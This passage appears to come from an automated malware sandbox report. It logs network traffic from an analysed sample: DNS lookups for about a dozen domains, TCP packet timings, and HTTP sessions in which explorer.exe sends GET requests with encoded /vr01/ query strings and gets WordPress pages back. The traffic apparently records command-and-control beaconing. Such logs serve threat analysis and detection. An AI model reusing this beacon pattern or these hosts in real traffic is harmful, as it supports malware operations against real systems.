                                                            Mar 18, 2024 14:45:01.182202101 CET4971680192.168.2.535.214.118.179
                                                            Mar 18, 2024 14:45:01.182528973 CET4971680192.168.2.535.214.118.179
                                                            Mar 18, 2024 14:45:01.344280958 CET804971635.214.118.179192.168.2.5
                                                            Mar 18, 2024 14:45:01.344521046 CET804971635.214.118.179192.168.2.5
                                                            Mar 18, 2024 14:45:01.344540119 CET804971635.214.118.179192.168.2.5
                                                            Mar 18, 2024 14:45:01.344716072 CET4971680192.168.2.535.214.118.179
                                                            Mar 18, 2024 14:45:01.344716072 CET4971680192.168.2.535.214.118.179
                                                            Mar 18, 2024 14:45:01.506777048 CET804971635.214.118.179192.168.2.5
                                                            Mar 18, 2024 14:45:21.548280954 CET4971780192.168.2.569.57.172.11
                                                            Mar 18, 2024 14:45:21.823781967 CET804971769.57.172.11192.168.2.5
                                                            Mar 18, 2024 14:45:21.823873043 CET4971780192.168.2.569.57.172.11
                                                            Mar 18, 2024 14:45:21.823977947 CET4971780192.168.2.569.57.172.11
                                                            Mar 18, 2024 14:45:22.101533890 CET804971769.57.172.11192.168.2.5
                                                            Mar 18, 2024 14:45:22.328646898 CET4971780192.168.2.569.57.172.11
                                                            Mar 18, 2024 14:45:22.645545959 CET804971769.57.172.11192.168.2.5
                                                            Mar 18, 2024 14:45:22.885150909 CET804971769.57.172.11192.168.2.5
                                                            Mar 18, 2024 14:45:22.885191917 CET804971769.57.172.11192.168.2.5
                                                            Mar 18, 2024 14:45:22.885262012 CET4971780192.168.2.569.57.172.11
                                                            Mar 18, 2024 14:45:22.885318995 CET4971780192.168.2.569.57.172.11
                                                            Mar 18, 2024 14:45:41.929991961 CET4971880192.168.2.534.149.87.45
                                                            Mar 18, 2024 14:45:42.018107891 CET804971834.149.87.45192.168.2.5
                                                            Mar 18, 2024 14:45:42.018235922 CET4971880192.168.2.534.149.87.45
                                                            Mar 18, 2024 14:45:42.018352032 CET4971880192.168.2.534.149.87.45
                                                            Mar 18, 2024 14:45:42.107120037 CET804971834.149.87.45192.168.2.5
                                                            Mar 18, 2024 14:45:42.532277107 CET4971880192.168.2.534.149.87.45
                                                            Mar 18, 2024 14:45:42.631365061 CET804971834.149.87.45192.168.2.5
                                                            Mar 18, 2024 14:45:42.868627071 CET804971834.149.87.45192.168.2.5
                                                            Mar 18, 2024 14:45:42.868693113 CET804971834.149.87.45192.168.2.5
                                                            Mar 18, 2024 14:45:42.868743896 CET4971880192.168.2.534.149.87.45
                                                            Mar 18, 2024 14:45:42.868783951 CET4971880192.168.2.534.149.87.45
                                                            Mar 18, 2024 14:46:05.626485109 CET4971980192.168.2.572.14.185.43
                                                            Mar 18, 2024 14:46:05.755656958 CET804971972.14.185.43192.168.2.5
                                                            Mar 18, 2024 14:46:05.755800962 CET4971980192.168.2.572.14.185.43
                                                            Mar 18, 2024 14:46:05.770153046 CET4971980192.168.2.572.14.185.43
                                                            Mar 18, 2024 14:46:05.900471926 CET804971972.14.185.43192.168.2.5
                                                            Mar 18, 2024 14:46:05.900505066 CET804971972.14.185.43192.168.2.5
                                                            Mar 18, 2024 14:46:05.900619984 CET4971980192.168.2.572.14.185.43
                                                            Mar 18, 2024 14:46:05.993393898 CET4971980192.168.2.572.14.185.43
                                                            Mar 18, 2024 14:46:06.122842073 CET804971972.14.185.43192.168.2.5
                                                            Mar 18, 2024 14:46:45.185435057 CET4972080192.168.2.53.33.130.190
                                                            Mar 18, 2024 14:46:45.273251057 CET80497203.33.130.190192.168.2.5
                                                            Mar 18, 2024 14:46:45.274070024 CET4972080192.168.2.53.33.130.190
                                                            Mar 18, 2024 14:46:45.274276018 CET4972080192.168.2.53.33.130.190
                                                            Mar 18, 2024 14:46:45.361769915 CET80497203.33.130.190192.168.2.5
                                                            Mar 18, 2024 14:46:45.370978117 CET80497203.33.130.190192.168.2.5
                                                            Mar 18, 2024 14:46:45.372376919 CET4972080192.168.2.53.33.130.190
                                                            Mar 18, 2024 14:46:45.375972986 CET4972080192.168.2.53.33.130.190
                                                            Mar 18, 2024 14:46:45.463438034 CET80497203.33.130.190192.168.2.5

                                                            UDP Packets

                                                            TimestampSource PortDest PortSource IPDest IP
                                                            Mar 18, 2024 14:43:39.361320019 CET5045553192.168.2.51.1.1.1
                                                            Mar 18, 2024 14:43:39.995450020 CET53504551.1.1.1192.168.2.5
                                                            Mar 18, 2024 14:43:58.579144001 CET5727553192.168.2.51.1.1.1
                                                            Mar 18, 2024 14:43:58.707021952 CET53572751.1.1.1192.168.2.5
                                                            Mar 18, 2024 14:44:18.985706091 CET6385853192.168.2.51.1.1.1
                                                            Mar 18, 2024 14:44:19.145958900 CET53638581.1.1.1192.168.2.5
                                                            Mar 18, 2024 14:44:40.094850063 CET5006453192.168.2.51.1.1.1
                                                            Mar 18, 2024 14:44:40.231262922 CET53500641.1.1.1192.168.2.5
                                                            Mar 18, 2024 14:45:00.907357931 CET5806253192.168.2.51.1.1.1
                                                            Mar 18, 2024 14:45:01.017431021 CET53580621.1.1.1192.168.2.5
                                                            Mar 18, 2024 14:45:21.369213104 CET6316653192.168.2.51.1.1.1
                                                            Mar 18, 2024 14:45:21.547061920 CET53631661.1.1.1192.168.2.5
                                                            Mar 18, 2024 14:45:41.735342979 CET6516353192.168.2.51.1.1.1
                                                            Mar 18, 2024 14:45:41.919918060 CET53651631.1.1.1192.168.2.5
                                                            Mar 18, 2024 14:46:04.157180071 CET5018253192.168.2.51.1.1.1
                                                            Mar 18, 2024 14:46:05.597383976 CET53501821.1.1.1192.168.2.5
                                                            Mar 18, 2024 14:46:05.624954939 CET5018253192.168.2.51.1.1.1
                                                            Mar 18, 2024 14:46:05.712866068 CET53501821.1.1.1192.168.2.5
                                                            Mar 18, 2024 14:46:24.469672918 CET5916553192.168.2.51.1.1.1
                                                            Mar 18, 2024 14:46:24.682709932 CET53591651.1.1.1192.168.2.5
                                                            Mar 18, 2024 14:46:45.061707020 CET6069653192.168.2.51.1.1.1
                                                            Mar 18, 2024 14:46:45.184146881 CET53606961.1.1.1192.168.2.5

                                                            DNS Queries

                                                            TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                            Mar 18, 2024 14:43:39.361320019 CET192.168.2.51.1.1.10x875Standard query (0)www.gratiasempirellc.comA (IP address)IN (0x0001)false
                                                            Mar 18, 2024 14:43:58.579144001 CET192.168.2.51.1.1.10x1255Standard query (0)www.laneflowlogistics.comA (IP address)IN (0x0001)false
                                                            Mar 18, 2024 14:44:18.985706091 CET192.168.2.51.1.1.10x75afStandard query (0)www.familyofficesheet.comA (IP address)IN (0x0001)false
                                                            Mar 18, 2024 14:44:40.094850063 CET192.168.2.51.1.1.10x42ceStandard query (0)www.mayorii.comA (IP address)IN (0x0001)false
                                                            Mar 18, 2024 14:45:00.907357931 CET192.168.2.51.1.1.10x50eaStandard query (0)www.flavorfog.onlineA (IP address)IN (0x0001)false
                                                            Mar 18, 2024 14:45:21.369213104 CET192.168.2.51.1.1.10xc1d8Standard query (0)www.bharatcrimecontrol24news.comA (IP address)IN (0x0001)false
                                                            Mar 18, 2024 14:45:41.735342979 CET192.168.2.51.1.1.10xf6a1Standard query (0)www.kirtirefrigeration.comA (IP address)IN (0x0001)false
                                                            Mar 18, 2024 14:46:04.157180071 CET192.168.2.51.1.1.10xc38fStandard query (0)www.topdeals.bizA (IP address)IN (0x0001)false
                                                            Mar 18, 2024 14:46:05.624954939 CET192.168.2.51.1.1.10xc38fStandard query (0)www.topdeals.bizA (IP address)IN (0x0001)false
                                                            Mar 18, 2024 14:46:24.469672918 CET192.168.2.51.1.1.10xadf4Standard query (0)www.michellecaldwelldesign.comA (IP address)IN (0x0001)false
                                                            Mar 18, 2024 14:46:45.061707020 CET192.168.2.51.1.1.10xa37bStandard query (0)www.accidentapp.onlineA (IP address)IN (0x0001)false

                                                            DNS Answers

                                                            TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                            Mar 18, 2024 14:43:39.995450020 CET1.1.1.1192.168.2.50x875No error (0)www.gratiasempirellc.comgratiasempirellc.comCNAME (Canonical name)IN (0x0001)false
                                                            Mar 18, 2024 14:43:39.995450020 CET1.1.1.1192.168.2.50x875No error (0)gratiasempirellc.com45.88.201.15A (IP address)IN (0x0001)false
                                                            Mar 18, 2024 14:43:58.707021952 CET1.1.1.1192.168.2.50x1255No error (0)www.laneflowlogistics.comlaneflowlogistics.comCNAME (Canonical name)IN (0x0001)false
                                                            Mar 18, 2024 14:43:58.707021952 CET1.1.1.1192.168.2.50x1255No error (0)laneflowlogistics.com76.223.105.230A (IP address)IN (0x0001)false
                                                            Mar 18, 2024 14:43:58.707021952 CET1.1.1.1192.168.2.50x1255No error (0)laneflowlogistics.com13.248.243.5A (IP address)IN (0x0001)false
                                                            Mar 18, 2024 14:44:19.145958900 CET1.1.1.1192.168.2.50x75afNo error (0)www.familyofficesheet.com104.16.36.105A (IP address)IN (0x0001)false
                                                            Mar 18, 2024 14:44:19.145958900 CET1.1.1.1192.168.2.50x75afNo error (0)www.familyofficesheet.com104.16.42.105A (IP address)IN (0x0001)false
                                                            Mar 18, 2024 14:44:19.145958900 CET1.1.1.1192.168.2.50x75afNo error (0)www.familyofficesheet.com104.19.240.93A (IP address)IN (0x0001)false
                                                            Mar 18, 2024 14:44:19.145958900 CET1.1.1.1192.168.2.50x75afNo error (0)www.familyofficesheet.com104.19.241.93A (IP address)IN (0x0001)false
                                                            Mar 18, 2024 14:44:40.231262922 CET1.1.1.1192.168.2.50x42ceName error (3)www.mayorii.comnonenoneA (IP address)IN (0x0001)false
                                                            Mar 18, 2024 14:45:01.017431021 CET1.1.1.1192.168.2.50x50eaNo error (0)www.flavorfog.online35.214.118.179A (IP address)IN (0x0001)false
                                                            Mar 18, 2024 14:45:21.547061920 CET1.1.1.1192.168.2.50xc1d8No error (0)www.bharatcrimecontrol24news.combharatcrimecontrol24news.comCNAME (Canonical name)IN (0x0001)false
                                                            Mar 18, 2024 14:45:21.547061920 CET1.1.1.1192.168.2.50xc1d8No error (0)bharatcrimecontrol24news.com69.57.172.11A (IP address)IN (0x0001)false
                                                            Mar 18, 2024 14:45:41.919918060 CET1.1.1.1192.168.2.50xf6a1No error (0)www.kirtirefrigeration.comcdn1.wixdns.netCNAME (Canonical name)IN (0x0001)false
                                                            Mar 18, 2024 14:45:41.919918060 CET1.1.1.1192.168.2.50xf6a1No error (0)cdn1.wixdns.nettd-ccm-neg-87-45.wixdns.netCNAME (Canonical name)IN (0x0001)false
                                                            Mar 18, 2024 14:45:41.919918060 CET1.1.1.1192.168.2.50xf6a1No error (0)td-ccm-neg-87-45.wixdns.net34.149.87.45A (IP address)IN (0x0001)false
                                                            Mar 18, 2024 14:46:05.597383976 CET1.1.1.1192.168.2.50xc38fNo error (0)www.topdeals.biz72.14.185.43A (IP address)IN (0x0001)false
                                                            Mar 18, 2024 14:46:05.597383976 CET1.1.1.1192.168.2.50xc38fNo error (0)www.topdeals.biz45.79.19.196A (IP address)IN (0x0001)false
                                                            Mar 18, 2024 14:46:05.597383976 CET1.1.1.1192.168.2.50xc38fNo error (0)www.topdeals.biz96.126.123.244A (IP address)IN (0x0001)false
                                                            Mar 18, 2024 14:46:05.597383976 CET1.1.1.1192.168.2.50xc38fNo error (0)www.topdeals.biz45.33.23.183A (IP address)IN (0x0001)false
                                                            Mar 18, 2024 14:46:05.597383976 CET1.1.1.1192.168.2.50xc38fNo error (0)www.topdeals.biz173.255.194.134A (IP address)IN (0x0001)false
                                                            Mar 18, 2024 14:46:05.597383976 CET1.1.1.1192.168.2.50xc38fNo error (0)www.topdeals.biz72.14.178.174A (IP address)IN (0x0001)false
                                                            Mar 18, 2024 14:46:05.597383976 CET1.1.1.1192.168.2.50xc38fNo error (0)www.topdeals.biz45.33.18.44A (IP address)IN (0x0001)false
                                                            Mar 18, 2024 14:46:05.597383976 CET1.1.1.1192.168.2.50xc38fNo error (0)www.topdeals.biz198.58.118.167A (IP address)IN (0x0001)false
                                                            Mar 18, 2024 14:46:05.597383976 CET1.1.1.1192.168.2.50xc38fNo error (0)www.topdeals.biz45.33.2.79A (IP address)IN (0x0001)false
                                                            Mar 18, 2024 14:46:05.597383976 CET1.1.1.1192.168.2.50xc38fNo error (0)www.topdeals.biz45.56.79.23A (IP address)IN (0x0001)false
                                                            Mar 18, 2024 14:46:05.597383976 CET1.1.1.1192.168.2.50xc38fNo error (0)www.topdeals.biz45.33.20.235A (IP address)IN (0x0001)false
                                                            Mar 18, 2024 14:46:05.597383976 CET1.1.1.1192.168.2.50xc38fNo error (0)www.topdeals.biz45.33.30.197A (IP address)IN (0x0001)false
                                                            Mar 18, 2024 14:46:05.712866068 CET1.1.1.1192.168.2.50xc38fNo error (0)www.topdeals.biz72.14.185.43A (IP address)IN (0x0001)false
                                                            Mar 18, 2024 14:46:05.712866068 CET1.1.1.1192.168.2.50xc38fNo error (0)www.topdeals.biz45.79.19.196A (IP address)IN (0x0001)false
                                                            Mar 18, 2024 14:46:05.712866068 CET1.1.1.1192.168.2.50xc38fNo error (0)www.topdeals.biz96.126.123.244A (IP address)IN (0x0001)false
                                                            Mar 18, 2024 14:46:05.712866068 CET1.1.1.1192.168.2.50xc38fNo error (0)www.topdeals.biz45.33.23.183A (IP address)IN (0x0001)false
                                                            Mar 18, 2024 14:46:05.712866068 CET1.1.1.1192.168.2.50xc38fNo error (0)www.topdeals.biz173.255.194.134A (IP address)IN (0x0001)false
                                                            Mar 18, 2024 14:46:05.712866068 CET1.1.1.1192.168.2.50xc38fNo error (0)www.topdeals.biz72.14.178.174A (IP address)IN (0x0001)false
                                                            Mar 18, 2024 14:46:05.712866068 CET1.1.1.1192.168.2.50xc38fNo error (0)www.topdeals.biz45.33.18.44A (IP address)IN (0x0001)false
                                                            Mar 18, 2024 14:46:05.712866068 CET1.1.1.1192.168.2.50xc38fNo error (0)www.topdeals.biz45.33.20.235A (IP address)IN (0x0001)false
                                                            Mar 18, 2024 14:46:05.712866068 CET1.1.1.1192.168.2.50xc38fNo error (0)www.topdeals.biz45.33.30.197A (IP address)IN (0x0001)false
                                                            Mar 18, 2024 14:46:05.712866068 CET1.1.1.1192.168.2.50xc38fNo error (0)www.topdeals.biz45.56.79.23A (IP address)IN (0x0001)false
                                                            Mar 18, 2024 14:46:05.712866068 CET1.1.1.1192.168.2.50xc38fNo error (0)www.topdeals.biz198.58.118.167A (IP address)IN (0x0001)false
                                                            Mar 18, 2024 14:46:05.712866068 CET1.1.1.1192.168.2.50xc38fNo error (0)www.topdeals.biz45.33.2.79A (IP address)IN (0x0001)false
                                                            Mar 18, 2024 14:46:24.682709932 CET1.1.1.1192.168.2.50xadf4Name error (3)www.michellecaldwelldesign.comnonenoneA (IP address)IN (0x0001)false
                                                            Mar 18, 2024 14:46:45.184146881 CET1.1.1.1192.168.2.50xa37bNo error (0)www.accidentapp.onlineaccidentapp.onlineCNAME (Canonical name)IN (0x0001)false
                                                            Mar 18, 2024 14:46:45.184146881 CET1.1.1.1192.168.2.50xa37bNo error (0)accidentapp.online3.33.130.190A (IP address)IN (0x0001)false
                                                            Mar 18, 2024 14:46:45.184146881 CET1.1.1.1192.168.2.50xa37bNo error (0)accidentapp.online15.197.148.33A (IP address)IN (0x0001)false

                                                            HTTP Request Dependency Graph

                                                            • www.gratiasempirellc.com
                                                            • www.laneflowlogistics.com
                                                            • www.familyofficesheet.com
                                                            • www.flavorfog.online
                                                            • www.bharatcrimecontrol24news.com
                                                            • www.kirtirefrigeration.com
                                                            • www.topdeals.biz
                                                            • www.accidentapp.online

                                                            HTTP Packets

                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                            0192.168.2.54971245.88.201.15801028C:\Windows\explorer.exe
                                                            TimestampBytes transferredDirectionData
                                                            Mar 18, 2024 14:43:40.128237963 CET169OUTGET /vr01/?F8=w7umpJ+rfj3CGTpHxtSOPW9QQGzAdMNJjdAKE5hb1nYkCdk9PPEgcDhma/h12TSv3owP&K0Dl=8pkho2W8C2 HTTP/1.1
                                                            Host: www.gratiasempirellc.com
                                                            Connection: close
                                                            Data Raw: 00 00 00 00 00 00 00
                                                            Data Ascii:
                                                            Mar 18, 2024 14:43:40.446310043 CET1286INHTTP/1.1 404 Not Found
                                                            Connection: close
                                                            x-powered-by: PHP/8.0.30
                                                            expires: Wed, 11 Jan 1984 05:00:00 GMT
                                                            cache-control: no-cache, must-revalidate, max-age=0
                                                            content-type: text/html; charset=UTF-8
                                                            link: <https://www.gratiasempirellc.com/wp-json/>; rel="https://api.w.org/"
                                                            transfer-encoding: chunked
                                                            date: Mon, 18 Mar 2024 13:43:39 GMT
                                                            server: LiteSpeed
                                                            Data Raw: 37 30 31 66 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 0a 3c 68 65 61 64 3e 0a 09 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 20 2f 3e 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 20 2f 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 27 72 6f 62 6f 74 73 27 20 63 6f 6e 74 65 6e 74 3d 27 6d 61 78 2d 69 6d 61 67 65 2d 70 72 65 76 69 65 77 3a 6c 61 72 67 65 27 20 2f 3e 0a 3c 74 69 74 6c 65 3e 50 61 67 65 20 6e 6f 74 20 66 6f 75 6e 64 20 26 23 38 32 31 31 3b 20 47 72 61 74 69 61 26 23 30 33 39 3b 73 20 45 6d 70 69 72 65 20 4c 4c 43 3c 2f 74 69 74 6c 65 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 61 6c 74 65 72 6e 61 74 65 22 20 74 79 70 65 3d 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 72 73 73 2b 78 6d 6c 22 20 74 69 74 6c 65 3d 22 47 72 61 74 69 61 26 23 30 33 39 3b 73 20 45 6d 70 69 72 65 20 4c 4c 43 20 26 72 61 71 75 6f 3b 20 46 65 65 64 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 67 72 61 74 69 61 73 65 6d 70 69 72 65 6c 6c 63 2e 63 6f 6d 2f 66 65 65 64 22 20 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 61 6c 74 65 72 6e 61 74 65 22 20 74 79 70 65 3d 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 72 73 73 2b 78 6d 6c 22 20 74 69 74 6c 65 3d 22 47 72 61 74 69 61 26 23 30 33 39 3b 73 20 45 6d 70 69 72 65 20 4c 4c 43 20 26 72 61 71 75 6f 3b 20 43 6f 6d 6d 65 6e 74 73 20 46 65 65 64 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 67 72 61 74 69 61 73 65 6d 70 69 72 65 6c 6c 63 2e 63 6f 6d 2f 63 6f 6d 6d 65 6e 74 73 2f 66 65 65 64 22 20 2f 3e 0a 3c 73 63 72 69 70 74 3e 0a 77 69 6e 64 6f 77 2e 5f 77 70 65 6d 6f 6a 69 53 65 74 74 69 6e 67 73 20 3d 20 7b 22 62 61 73 65 55 72 6c 22 3a 22 68 74 74 70 73 3a 5c 2f 5c 2f 73 2e 77 2e 6f 72 67 5c 2f 69 6d 61 67 65 73 5c 2f 63 6f 72 65 5c 2f 65 6d 6f 6a 69 5c 2f 31 34 2e 30 2e 30 5c 2f 37 32 78 37 32 5c 2f 22 2c 22 65 78 74 22 3a 22 2e 70 6e 67 22 2c 22 73 76 67 55 72 6c 22 3a 22 68 74 74 70 73 3a 5c 2f 5c 2f 73 2e 77 2e 6f 72 67 5c 2f 69 6d 61 67 65 73 5c 2f 63 6f 72 65 5c 2f 65 6d 6f 6a 69 5c 2f 31 34 2e 30 2e 30 5c 2f 73 76 67 5c 2f 22 2c 22 73 76 67 45 78 74 22 3a 22 2e 73 76 67 22 2c 22 73 6f 75 72 63 65 22 3a 7b 22 63 6f 6e 63 61 74 65 6d 6f 6a 69 22 3a 22 68 74 74 70 3a 5c 2f 5c 2f 77 77 77 2e 67 72 61 74 69 61 73 65 6d 70 69 72 65 6c 6c 63 2e 63 6f 6d 5c 2f 77 70 2d 69 6e 63 6c 75 64 65 73 5c 2f 6a 73 5c 2f 77 70 2d 65 6d 6f 6a 69 2d 72 65 6c 65 61 73 65 2e 6d 69 6e 2e 6a 73 3f 76 65 72 3d 36 2e 34 2e 33 22 7d 7d 3b 0a 2f 2a 21 20 54 68 69 73 20 66 69 6c 65 20 69 73 20 61 75 74 6f 2d 67 65 6e 65 72 61 74 65 64 20 2a 2f 0a 21 66
                                                            Data Ascii: 701f<!DOCTYPE html><html lang="en-US"><head><meta charset="UTF-8" /><meta name="viewport" content="width=device-width, initial-scale=1" /><meta name='robots' content='max-image-preview:large' /><title>Page not found &#8211; Gratia&#039;s Empire LLC</title><link rel="alternate" type="application/rss+xml" title="Gratia&#039;s Empire LLC &raquo; Feed" href="https://www.gratiasempirellc.com/feed" /><link rel="alternate" type="application/rss+xml" title="Gratia&#039;s Empire LLC &raquo; Comments Feed" href="https://www.gratiasempirellc.com/comments/feed" /><script>window._wpemojiSettings = {"baseUrl":"https:\/\/s.w.org\/images\/core\/emoji\/14.0.0\/72x72\/","ext":".png","svgUrl":"https:\/\/s.w.org\/images\/core\/emoji\/14.0.0\/svg\/","svgExt":".svg","source":{"concatemoji":"http:\/\/www.gratiasempirellc.com\/wp-includes\/js\/wp-emoji-release.min.js?ver=6.4.3"}};/*! This file is auto-generated */!f
                                                            Mar 18, 2024 14:43:40.446384907 CET1286INData Raw: 75 6e 63 74 69 6f 6e 28 69 2c 6e 29 7b 76 61 72 20 6f 2c 73 2c 65 3b 66 75 6e 63 74 69 6f 6e 20 63 28 65 29 7b 74 72 79 7b 76 61 72 20 74 3d 7b 73 75 70 70 6f 72 74 54 65 73 74 73 3a 65 2c 74 69 6d 65 73 74 61 6d 70 3a 28 6e 65 77 20 44 61 74 65
                                                            Data Ascii: unction(i,n){var o,s,e;function c(e){try{var t={supportTests:e,timestamp:(new Date).valueOf()};sessionStorage.setItem(o,JSON.stringify(t))}catch(e){}}function p(e,t,n){e.clearRect(0,0,e.canvas.width,e.canvas.height),e.fillText(t,0,0);var t=new
                                                            Mar 18, 2024 14:43:40.446444035 CET1286INData Raw: 61 2e 66 6f 6e 74 3d 22 36 30 30 20 33 32 70 78 20 41 72 69 61 6c 22 2c 7b 7d 29 3b 72 65 74 75 72 6e 20 65 2e 66 6f 72 45 61 63 68 28 66 75 6e 63 74 69 6f 6e 28 65 29 7b 6f 5b 65 5d 3d 74 28 61 2c 65 2c 6e 29 7d 29 2c 6f 7d 66 75 6e 63 74 69 6f
                                                            Data Ascii: a.font="600 32px Arial",{});return e.forEach(function(e){o[e]=t(a,e,n)}),o}function t(e){var t=i.createElement("script");t.src=e,t.defer=!0,i.head.appendChild(t)}"undefined"!=typeof Promise&&(o="wpEmojiSettingsSupports",s=["flag","emoji"],n.su
                                                            Mar 18, 2024 14:43:40.446533918 CET1286INData Raw: 5b 74 5d 29 3b 6e 2e 73 75 70 70 6f 72 74 73 2e 65 76 65 72 79 74 68 69 6e 67 45 78 63 65 70 74 46 6c 61 67 3d 6e 2e 73 75 70 70 6f 72 74 73 2e 65 76 65 72 79 74 68 69 6e 67 45 78 63 65 70 74 46 6c 61 67 26 26 21 6e 2e 73 75 70 70 6f 72 74 73 2e
                                                            Data Ascii: [t]);n.supports.everythingExceptFlag=n.supports.everythingExceptFlag&&!n.supports.flag,n.DOMReady=!1,n.readyCallback=function(){n.DOMReady=!0}}).then(function(){return e}).then(function(){var e;n.supports.everything||(n.readyCallback(),(e=n.so
                                                            Mar 18, 2024 14:43:40.446665049 CET1286INData Raw: 6c 2d 6c 72 5d 29 2c 68 35 2e 68 61 73 2d 74 65 78 74 2d 61 6c 69 67 6e 2d 72 69 67 68 74 5b 73 74 79 6c 65 2a 3d 77 72 69 74 69 6e 67 2d 6d 6f 64 65 5d 3a 77 68 65 72 65 28 5b 73 74 79 6c 65 2a 3d 76 65 72 74 69 63 61 6c 2d 72 6c 5d 29 2c 68 36
                                                            Data Ascii: l-lr]),h5.has-text-align-right[style*=writing-mode]:where([style*=vertical-rl]),h6.has-text-align-left[style*=writing-mode]:where([style*=vertical-lr]),h6.has-text-align-right[style*=writing-mode]:where([style*=vertical-rl]){rotate:180deg}</s
                                                            Mar 18, 2024 14:43:40.446746111 CET1286INData Raw: 20 2d 30 2e 31 65 6d 20 21 69 6d 70 6f 72 74 61 6e 74 3b 0a 09 09 62 61 63 6b 67 72 6f 75 6e 64 3a 20 6e 6f 6e 65 20 21 69 6d 70 6f 72 74 61 6e 74 3b 0a 09 09 70 61 64 64 69 6e 67 3a 20 30 20 21 69 6d 70 6f 72 74 61 6e 74 3b 0a 09 7d 0a 3c 2f 73
                                                            Data Ascii: -0.1em !important;background: none !important;padding: 0 !important;}</style><style id='wp-block-library-inline-css'>:root{--wp-admin-theme-color:#007cba;--wp-admin-theme-color--rgb:0,124,186;--wp-admin-theme-color-darker-10:#006ba
                                                            Mar 18, 2024 14:43:40.446825027 CET1286INData Raw: 33 35 64 65 67 2c 23 66 61 66 61 65 31 2c 23 36 37 61 36 37 31 29 7d 3a 72 6f 6f 74 20 2e 68 61 73 2d 61 74 6f 6d 69 63 2d 63 72 65 61 6d 2d 67 72 61 64 69 65 6e 74 2d 62 61 63 6b 67 72 6f 75 6e 64 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 6c 69 6e 65
                                                            Data Ascii: 35deg,#fafae1,#67a671)}:root .has-atomic-cream-gradient-background{background:linear-gradient(135deg,#fdd79a,#004a59)}:root .has-nightshade-gradient-background{background:linear-gradient(135deg,#330968,#31cdcf)}:root .has-midnight-gradient-bac
                                                            Mar 18, 2024 14:43:40.446877956 CET1286INData Raw: 67 68 74 3a 6e 6f 72 6d 61 6c 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 20 32 33 70 78 20 31 34 70 78 3b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 6e 6f 6e 65 3b 74 6f 70 3a 35 70 78 3b 77 69 64 74 68 3a 61 75 74 6f 3b 7a 2d 69 6e 64 65 78 3a
                                                            Data Ascii: ght:normal;padding:15px 23px 14px;text-decoration:none;top:5px;width:auto;z-index:100000}html :where(.has-border-color){border-style:solid}html :where([style*=border-top-color]){border-top-style:solid}html :where([style*=border-right-color]){b
                                                            Mar 18, 2024 14:43:40.446913958 CET1286INData Raw: 2d 70 72 65 73 65 74 2d 2d 63 6f 6c 6f 72 2d 2d 6c 75 6d 69 6e 6f 75 73 2d 76 69 76 69 64 2d 6f 72 61 6e 67 65 3a 20 23 66 66 36 39 30 30 3b 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 63 6f 6c 6f 72 2d 2d 6c 75 6d 69 6e 6f 75 73 2d 76 69 76 69 64
                                                            Data Ascii: -preset--color--luminous-vivid-orange: #ff6900;--wp--preset--color--luminous-vivid-amber: #fcb900;--wp--preset--color--light-green-cyan: #7bdcb5;--wp--preset--color--vivid-green-cyan: #00d084;--wp--preset--color--pale-cyan-blue: #8ed1fc;--wp--
                                                            Mar 18, 2024 14:43:40.446995974 CET1286INData Raw: 2d 70 72 65 73 65 74 2d 2d 67 72 61 64 69 65 6e 74 2d 2d 63 6f 6f 6c 2d 74 6f 2d 77 61 72 6d 2d 73 70 65 63 74 72 75 6d 3a 20 6c 69 6e 65 61 72 2d 67 72 61 64 69 65 6e 74 28 31 33 35 64 65 67 2c 72 67 62 28 37 34 2c 32 33 34 2c 32 32 30 29 20 30
                                                            Data Ascii: -preset--gradient--cool-to-warm-spectrum: linear-gradient(135deg,rgb(74,234,220) 0%,rgb(151,120,209) 20%,rgb(207,42,186) 40%,rgb(238,44,130) 60%,rgb(251,105,98) 80%,rgb(254,248,76) 100%);--wp--preset--gradient--blush-light-purple: linear-gradi
                                                            Mar 18, 2024 14:43:40.573178053 CET1286INData Raw: 6d 29 20 2a 20 34 2e 30 39 31 29 2c 20 34 72 65 6d 29 3b 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 66 6f 6e 74 2d 66 61 6d 69 6c 79 2d 2d 72 6f 62 6f 74 6f 3a 20 22 52 6f 62 6f 74 6f 22 2c 73 61 6e 73 2d 73 65 72 69 66 3b 2d 2d 77 70 2d 2d 70 72
                                                            Data Ascii: m) * 4.091), 4rem);--wp--preset--font-family--roboto: "Roboto",sans-serif;--wp--preset--font-family--roboto-condensed: "Roboto Condensed",sans-serif;--wp--preset--font-family--open-sans: "Open Sans",sans-serif;--wp--preset--font-family--lato:


                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                            1192.168.2.54971376.223.105.230801028C:\Windows\explorer.exe
                                                            TimestampBytes transferredDirectionData
                                                            Mar 18, 2024 14:43:58.800884962 CET170OUTGET /vr01/?K0Dl=8pkho2W8C2&F8=afsJSrVtQy935SgvDMKIlJRgvlqACV7EhITZbFrNAvlElQGaJzKQmMA6gaTM16h48AiD HTTP/1.1
                                                            Host: www.laneflowlogistics.com
                                                            Connection: close
                                                            Data Raw: 00 00 00 00 00 00 00
                                                            Data Ascii:
                                                            Mar 18, 2024 14:43:58.908835888 CET419INHTTP/1.1 301 Moved Permanently
